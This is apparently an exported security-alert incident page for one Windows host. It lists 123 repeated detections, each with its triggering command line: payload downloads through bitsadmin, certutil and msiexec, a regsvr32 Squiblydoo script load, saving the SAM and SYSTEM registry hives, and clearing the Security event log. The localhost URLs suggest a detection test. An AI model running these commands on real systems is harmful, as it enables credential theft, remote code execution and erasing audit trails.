Back to list

Incident Overview

Incident ID CINC-20251220-570CB2D3
Severity Critical (90)
Status new
Alert Count 123
Host Count 1

Timeline

First Seen 2025-12-18 08:32:18
Last Seen 2025-12-18 19:59:06
Duration 0d 11h 26m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Defense Evasion Credential Access Command and Control Persistence Execution
Techniques:
BITS Jobs Indicator Removal OS Credential Dumping Regsvr32 Ingress Tool Transfer Event Triggered Execution User Execution

Affected Hosts (1)

TEAHEE

Related Alerts (123)

Severity Status Hostname Description Tactic Command Line Time
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 19:59
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 19:51
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 19:48
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 19:48
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 19:31
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 19:31
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 14:35
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 14:35
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 13:49
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 13:42
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 13:39
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 13:38
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 13:38
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 13:38
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 12:42
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 12:39
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 12:38
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 12:38
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 12:38
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 12:35
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 11:42
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 11:42
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 11:38
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 11:38
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 11:38
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 11:35
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 10:50
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:46
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 10:42
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:42
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:39
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 10:39
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 10:35
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:35
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 10:35
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:32
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:28
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 10:28
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:25
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 10:25
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 10:21
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:18
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:14
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 10:11
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 10:07
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 10:03
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 10:00
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:57
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:56
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:53
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:53
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:49
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:49
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 09:46
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:46
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:42
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:42
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:42
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 09:42
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:39
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:39
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:39
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:35
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:35
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 09:35
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:32
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:32
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:28
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:28
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:25
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:25
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:25
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:21
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:21
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 09:21
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 09:18
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:18
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 09:14
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:14
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 09:14
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:14
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:11
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:11
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:11
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 09:07
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 09:07
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:07
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 09:04
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 09:04
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 09:04
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:04
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:04
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 09:00
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 09:00
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 09:00
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 09:00
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 08:57
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 08:57
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 08:53
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 08:53
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 08:53
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 08:50
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 08:49
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 08:49
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 08:49
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 08:49
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 08:46
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 08:46
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 08:42
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 08:42
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 08:42
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 08:39
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 08:39
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 08:39
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 08:39
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 08:39
High new TEAHEE A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 08:35
High new TEAHEE Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\dokji\AppData\Local\Temp\cert.exe 12-18 08:35
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\dokji\AppData\Local\Temp\b.exe 12-18 08:35
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\sys.hiv 12-18 08:35
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv 12-18 08:35
High new TEAHEE A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 08:35
